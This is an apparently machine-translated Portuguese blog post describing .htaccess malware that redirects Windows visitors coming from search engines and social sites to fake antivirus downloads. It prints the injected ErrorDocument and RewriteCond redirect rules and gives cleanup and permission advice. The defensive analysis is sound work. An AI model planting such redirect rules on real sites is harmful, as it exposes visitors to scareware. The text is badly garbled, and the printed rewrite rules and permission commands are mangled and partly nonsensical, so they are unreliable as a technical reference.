Malware / Virus - .htaccess "reescrever" e redirecionar

Uma nova forma de vírus que ver que não sabe muito afeta sites hospedados servidores não confiáveis onde os usuários contas / subcontas podem "ver" um ao outro. Especificamente, as contas de hospedagem são feitas todas em pasta "vhosts"A escrita eo direito de pasta de usuário os "vhosts" é dado um general usuário revendedor ... na maioria das situações. É um método que não utilize os servidores web típicas WHM / cPanel.

Ação do vírus Htaccess -.. Hack Htaccess

Vírus afeta os arquivos .htaccess o local vítima. As linhas são adicionados / Directivas para redirecionar os visitantes (Vindo de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc sites e portais com alto tráfego) para alguns sites que oferecem "antivírus. "É falso antivírus, Sobre o qual escrevi na introdução .

Aqui está o que parece um .htaccess afetada: (Não é possível acessar as linhas de URLs conteúdo abaixo)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine ativado

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pesquisa. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule *. [R, L]

RewriteCond% {} REQUEST_FILENAME!-F
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {} * REQUEST_FILENAME Jpg $ | |. *. Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule *. [R, L]

Aqueles que usam o WordPress irá encontrar estas linhas no arquivo .htaccess de public_html. Além disso, o vírus cria um. Htaccess na mesma pasta wp-content.

*Há também situações em que, em vez aparece peoriavascularsurgery.com dns.thesoulfoodcafe.com ou outros endereços.

O que torna este vírus.

Uma vez redirecionado, o visitante é recebido de braços abertos pela mensagem:

Atenção!
O computador contém vários sinais de vírus e programas de presença de malware. Seu sistema anti-vírus Requer verificação imediata!
Sistema de Segurança irá realizar uma varredura rápida e livre de seu PC de vírus e programas maliciosos.

1 malwares

Não importa qual botão é pressionado, somos levados à página "meu computador"Criado para imitar XP projeto. Esta inicia automaticamente "varredura" no final do qual encontramos que "infectado".

2 malwares

Após clicar em OK ou Cancelar, ele vai começar baixarArquivo setup.exe. esta setup.exe é anti-vírus falso que afectam o sistema. Instalar algum malware para propagar outros links comprometidos, e para além destes um software anti-vírus (Todos falsa) de que a vítima é convidada para comprar.
Aqueles que já contactou o vírus pode usar este formulário . Também é recomendável analisar o disco rígido inteiro. Recomendar Kaspersky Internet Security ou Kaspersky Anti-Virus.

Este tipo de vírus afeta os sistemas operacionais OS visitantes Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 e Windows 95. Até o momento não há casos conhecidos de infecção do sistema operacional Windows Vista e 7 Windows.

Como podemos eliminar este vírus. Htaccess no servidor e como prevenir a infecção.

1. Analisar arquivos suspeitos e códigos de apagamento. Para garantir que o arquivo não é afetada somente .htaccess você deveria analisar todos os arquivos . Php si . Js.

2. Reescrever o arquivo. Htaccess e definir o chmod 644 ou 744 com acesso de gravação apenas usuário proprietário.

3. Quando você cria uma conta de hospedagem para um site na pasta / Home ou / Webroot Isto irá criar automaticamente uma pasta que muitas vezes tem o nome do usuário (usuário para cpanel, ftpEtc.) Para evitar que dados de escrita e vírus que transmitem a partir de um usuário para outro, recomenda-se que cada pasta de usuário a ser definido:

chmod 644 ou 744, 755 - mostrado é 644.
chown-R nume_folder nume_user.
chgrp-R nume_user nume_folder

ls-tudo maneiras de verificar se eles foram feitos corretamente. Deverá aparecer algo como isto:

drwx-x-x 12 dinâmicas dinâmicas Maio 4096 6 14: 51 dinâmicas /
drwx-x-x 10 4096 março 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 tubos tubos 4096 Jan 29 11: 23 tubos /
drwxr-xr-x 14 4096 fevereiro 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 Maio 19 01: 09 EZO /
drwx-x-x 9 pharma pharma 4096 dezembro 19 22: 29 pharma /

Se um dos acima irá userele FTP Os arquivos infectadosNão pode enviar o vírus para outro host do usuário. É uma medida de segurança mínima para proteger as contas hospedados em um servidor web.

Elementos comuns de áreas afetadas por este vírus.

Todas as áreas afetadas redirecionar os visitantes para sites por nome de domínio que contêm "/".

Este "vírus. htaccess"Afeto qualquer CMS (Joomla, WordPress, phpBBEtc) usando .htaccess.

. Htaccess Redirect Virus & Corte.

Malware / Virus - .htaccess "reescrever" e redirecionar

Sobre o autor

Discrição LP

Fundador e editor Opções de invisibilidadeNa data 2006.
Experiência em sistemas Linux operacionais (especialmente CentOS), Mac OS X, Windows XP> Windows 10 e WordPress (CMS).

Deixe um comentário

Este site usa o Akismet para reduzir o spam. Saiba como seus dados de comentário são processados.